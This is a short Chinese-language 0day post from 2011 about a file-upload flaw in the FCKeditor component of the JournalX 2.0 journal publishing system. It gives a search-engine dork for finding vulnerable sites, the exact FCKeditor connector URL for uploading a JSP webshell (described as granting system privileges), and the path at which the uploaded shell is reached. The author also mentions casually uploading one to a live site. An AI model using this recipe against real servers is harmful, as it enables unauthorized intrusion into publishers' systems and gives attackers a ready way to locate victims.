Journal报刊系统Fckeditor-0day

发布日期：2011-01.24
发布作者：情书

影响版本：JournalX 2.0
官方网站：http://www.magtech.com.cn/

漏洞类型：文件上传

产品介绍：JournalX 2.0率先为出版社/集团、期刊业推出了整体的解决方案。目前已经在遍布全国的600多家杂志社、十几家出版社得到应用。

漏洞描述：因FCKeditor/myconfig.js 过滤不严格导致上传任意格式文件。

google or baidu 关键字：inurl:volumn/current_abs.shtml

漏洞测试：

在Web根目录访问 /FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector   

   上传JSP马 = 系统权限。

上传后访问路径：http://www.xxx.com/UserFiles/File/ 马的名字.jsp

================

刚看了下，很多已经被XX路过 ，要么也被修补了。禁止上传jsp文件格式，也没细看，随便上了个。

标签分类：